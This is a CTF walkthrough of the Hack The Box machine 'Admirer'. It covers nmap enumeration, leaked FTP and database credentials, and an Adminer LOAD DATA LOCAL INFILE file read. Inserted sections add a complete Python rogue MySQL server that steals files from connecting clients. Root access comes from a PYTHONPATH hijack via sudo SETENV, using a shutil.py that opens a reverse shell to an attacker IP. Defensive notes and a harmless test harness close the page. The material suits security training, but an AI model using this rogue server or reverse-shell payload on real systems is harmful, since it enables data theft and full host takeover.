davyjones

admirer

May 3rd, 2020
# Nmap 7.80 scan initiated Sat May 2 17:43:44 2020 as: nmap -sC -sV -oN nmap/admirer 10.10.10.187
Nmap scan report for 10.10.10.187
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 2 17:44:20 2020 -- 1 IP address (1 host up) scanned in 35.61 seconds
  22.  
  23.  
Running gobuster doesn't reveal much, but before that I had already opened http://10.10.10.187/robots.txt
  25.  
  26.  
  27.  
User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir
  32.  
  33.  
  34.  
Following waldo's hint, I downloaded http://10.10.10.187/admin-dir/contacts.txt and http://10.10.10.187/admin-dir/credentials.txt, which reveal the FTP credentials as

ftpuser
%n?4Wz}R$tTF7
  41.  
  42.  
Using those creds on FTP I downloaded html.tar.gz and dump.sql.
Checking the html dump I saw something interesting in utility-scripts/db_admin.php:
  45.  
  46.  
<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>
  64.  
  65.  
  66.  
  67.  
  68.  
I also saw that admin_tasks.php had:
  70.  
  71.  
<?php
// $task is set earlier in the file (not shown in this excerpt)
if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
   $task == '5' || $task == '6' || $task == '7')
{
    echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
}
else
{
    echo("Invalid task.");
}
?>
  84.  
but after playing around a lot I was unable to bypass the if condition.
  86.  
So I tried all the passwords I already had on SSH with all the usernames.

http://10.10.10.187/utility-scripts/adminer.php
  90.  
Reading a blog post shows that Adminer lets us connect to a MySQL server hosted by me, on my own machine. Adminer then acts as a MySQL client running on the target, so a LOAD DATA LOCAL INFILE statement makes that client read a file from the target's own filesystem and send it to my database.
  92.  
  93.  
Dumping data to the table (typed into Adminer's SQL command box after logging in to my own MySQL server, which needs local_infile enabled and a table named data to receive the rows):

load data local infile '../index.php'
into table data
fields terminated by "\n"

The path is resolved on the target by the PHP process, relative to the directory of adminer.php, so ../index.php is /var/www/html/index.php. Selecting from the data table then dumps index.php, which has the DB password as &<h5b~yK3F#{PaPB&dA}{H>
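The paste does this with a real MySQL server and a `data` table. The same file read does not need MySQL at all: Adminer's PHP backend is a MySQL client, and in the MySQL protocol it is the *server* that names the local file by answering a query with a LOCAL INFILE request packet (a 0xFB byte followed by the path). The rogue server below is an added example written for this page; it is not code from the original paste, from Adminer, or from the box. It assumes Adminer is pointed at the attacker's IP (any username/password is accepted), that the target's PHP MySQL driver still has local infile enabled (the technique relies on this; newer PHP releases default mysqli.allow_local_infile to Off), and the path /var/www/html/index.php is this example's choice of target. Names such as `serve_connection`, `handshake_v10` and `SERVER_CAPS` are the example's own.

```python
import socket
import struct

# Capability flags advertised in the handshake (MySQL client/server protocol).
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LOCAL_FILES = 0x00000080        # "the server may ask the client for a local file"
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
SERVER_CAPS = (CLIENT_LONG_PASSWORD | CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41
               | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)


def frame(seq, payload):
    """Wrap a payload in the 4-byte MySQL packet header: 3-byte LE length, 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("client closed connection")
        buf += chunk
    return buf


def read_packet(sock):
    """Read one MySQL packet; returns (sequence id, payload)."""
    header = _recv_exact(sock, 4)
    length = header[0] | (header[1] << 8) | (header[2] << 16)
    return header[3], _recv_exact(sock, length)


def handshake_v10():
    """Protocol::HandshakeV10 with a fixed 20-byte salt; the server version string is made up."""
    salt = b"A" * 20
    return (b"\x0a" + b"5.7.29-rogue\x00"
            + struct.pack("<I", 1)                     # connection id
            + salt[:8] + b"\x00"                       # auth-plugin-data-part-1, filler
            + struct.pack("<H", SERVER_CAPS & 0xFFFF)  # capability flags, lower 16 bits
            + b"\x21"                                  # charset utf8_general_ci
            + struct.pack("<H", 0x0002)                # status flags: autocommit
            + struct.pack("<H", SERVER_CAPS >> 16)     # capability flags, upper 16 bits
            + bytes([len(salt) + 1])                   # length of auth-plugin-data
            + b"\x00" * 10                             # reserved
            + salt[8:] + b"\x00"                       # auth-plugin-data-part-2 (13 bytes)
            + b"mysql_native_password\x00")            # auth plugin name


def ok_packet():
    """OK_Packet: header 0x00, affected rows 0, last insert id 0, status autocommit, 0 warnings."""
    return b"\x00\x00\x00" + struct.pack("<H", 0x0002) + struct.pack("<H", 0)


def serve_connection(sock, target_path):
    """Handle one client: accept any login, answer its first query with a LOCAL INFILE
    request for target_path, and return (query packet, file bytes the client sent back)."""
    sock.sendall(frame(0, handshake_v10()))
    seq, _login = read_packet(sock)               # HandshakeResponse41: credentials are ignored
    sock.sendall(frame(seq + 1, ok_packet()))     # "login successful"
    seq, query = read_packet(sock)                # first COM_QUERY the client sends, whatever it is
    sock.sendall(frame(seq + 1, b"\xfb" + target_path.encode()))   # LOCAL INFILE request
    chunks = []
    seq, data = read_packet(sock)
    while data:                                   # an empty packet terminates the file transfer
        chunks.append(data)
        seq, data = read_packet(sock)
    sock.sendall(frame(seq + 1, ok_packet()))
    return query, b"".join(chunks)


def main(listen=("0.0.0.0", 3306), target_path="/var/www/html/index.php"):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen)
    srv.listen(1)
    while True:
        client, addr = srv.accept()
        with client:
            try:
                query, data = serve_connection(client, target_path)
                print(f"[{addr[0]}] query {query[1:]!r}\n{data.decode(errors='replace')}")
            except ConnectionError as exc:
                print(f"[{addr[0]}] {exc}")


if __name__ == "__main__":
    main()
```

Run it on the attacking host (it binds port 3306) and point Adminer's "Server" field at it: the first query the PHP client sends after login, whatever it is, comes back as the bytes of the requested file. The defensive view is the same packet: a client should only honour 0xFB when it actually issued LOAD DATA LOCAL, so keep local infile disabled in the client (mysqli.allow_local_infile=Off) and never expose a database tool that lets users pick the server host.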
  101.  
Using that DB password on SSH as user waldo gives a user shell, and we have user.txt.
  105.  
  106.  
Privilege Escalation

Running sudo -l

Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
  116.  
We see we can run /opt/scripts/admin_tasks.sh as root, and the SETENV tag means we may pass environment variables through sudo. Reading the code:
  118.  
  119.  
  120.  
#!/bin/bash

view_uptime()
{
    /usr/bin/uptime -p
}

view_users()
{
    /usr/bin/w
}

view_crontab()
{
    /usr/bin/crontab -l
}

backup_passwd()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_shadow()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_db()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running mysqldump in the background, it may take a while..."
        #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
        /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}



# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;

        *) echo "Unknown option." >&2
    esac

    exit 0
fi


# Interactive way, to be called from the command line
options=("View system uptime"
         "View logged in users"
         "View crontab"
         "Backup passwd file"
         "Backup shadow file"
         "Backup web data"
         "Backup DB"
         "Quit")

echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo "Bye!" ; break ;;

        *) echo "Unknown option." >&2
    esac
done

exit 0
  241.  
  242.  
  243.  
  244.  
Checking the backup_web function we see that it runs /opt/scripts/backup.py & as root (the branch only executes when EUID is 0, i.e. under sudo):
  246.  
  247.  
backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}
  258.  
  259.  
  260.  
  261.  
And the Python script /opt/scripts/backup.py:
  263.  
  264.  
  265.  
#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
  274.  
  275.  
  276.  
Since the sudo rule has SETENV, we can hand environment variables to the root process, so we can hijack Python's module search path with PYTHONPATH: backup.py imports shutil, and directories listed in PYTHONPATH are searched before the standard library. Create a file named shutil.py in the current directory containing
  280.  
  281.  
  282.  
import os
import pty
import socket

lhost = "10.10.14.174"   # attacker IP
lport = 4444             # port the nc listener waits on

# These stubs are never used here: backup.py only does
# `from shutil import make_archive`, and the module body below runs as soon
# as Python resolves that import to this file.
ZIP_DEFLATED = 0

class ZipFile:
    def close(*args):
        return

    def write(*args):
        return

    def __init__(self, *args):
        return

# Reverse shell, executed at import time (as root, because backup.py runs via sudo)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
  310.  
  311.  
  312.  
  313.  
Start a nc listener on 10.10.14.174:4444 (nc -lvnp 4444) and run

sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6

Option 6 calls backup_web(), which runs /opt/scripts/backup.py as root; its `from shutil import make_archive` now resolves to our shutil.py, the reverse shell fires at import time, and we have root now :)
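Why `sudo -E PYTHONPATH=...` works, and what stops it, shown with a harmless stand-in added for this page (not code from the original paste or from the box): the fake shutil.py only writes a marker file instead of spawning a reverse shell, and the backup-script stand-in reports which shutil module answered its import. The third case runs the stand-in with `python3 -I` (isolated mode), which ignores PYTHONPATH. `FAKE_SHUTIL`, `BACKUP_PY`, `run_backup` and the `HIJACK_MARKER` variable are this example's own names.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed stand-in for the planted shutil.py. Instead of a reverse shell it
# only records that it was imported, so the effect is observable and harmless.
FAKE_SHUTIL = textwrap.dedent("""\
    import os
    # runs at import time, before backup.py ever reaches make_archive()
    with open(os.environ["HIJACK_MARKER"], "w") as f:
        f.write("hijacked")
    def make_archive(*args, **kwargs):
        return "fake-archive"
""")

# Stand-in for /opt/scripts/backup.py: the same import line as the real script,
# then it reports which shutil module actually satisfied the import.
BACKUP_PY = textwrap.dedent("""\
    from shutil import make_archive
    import shutil
    print(shutil.__file__)
""")


def run_backup(hijack: bool, isolated: bool) -> dict:
    """Run the backup stand-in in a fresh interpreter and report what happened.

    hijack   -- put a directory holding the fake shutil.py on PYTHONPATH, which is
                what `sudo -E PYTHONPATH=$(pwd) ...` achieves on the box
    isolated -- run python3 with -I, which ignores PYTHONPATH and the script
                directory (the simplest hardening for a script run as root)
    """
    with tempfile.TemporaryDirectory() as work:
        evil_dir = os.path.join(work, "evil")
        os.mkdir(evil_dir)
        with open(os.path.join(evil_dir, "shutil.py"), "w") as f:
            f.write(FAKE_SHUTIL)
        backup = os.path.join(work, "backup.py")
        with open(backup, "w") as f:
            f.write(BACKUP_PY)
        marker = os.path.join(work, "marker")

        env = dict(os.environ, HIJACK_MARKER=marker)
        env.pop("PYTHONPATH", None)        # start from a clean search path
        if hijack:
            env["PYTHONPATH"] = evil_dir   # evil_dir is searched before the stdlib
        cmd = [sys.executable] + (["-I"] if isolated else []) + [backup]
        result = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)

        loaded_dir = os.path.realpath(os.path.dirname(result.stdout.strip()))
        return {
            "hijacked": loaded_dir == os.path.realpath(evil_dir),
            "marker_written": os.path.exists(marker),
        }


if __name__ == "__main__":
    for hijack, isolated in ((False, False), (True, False), (True, True)):
        print(f"hijack={hijack!s:5} isolated={isolated!s:5} -> {run_backup(hijack, isolated)}")
```

With env_reset alone sudo would drop PYTHONPATH; it is the SETENV tag (together with -E or a VAR=value on the command line) that lets waldo hand it to a root process. Removing SETENV from the sudoers entry, or giving backup.py a `#!/usr/bin/python3 -I` shebang, closes this path, and the three cases above are the check that it is closed.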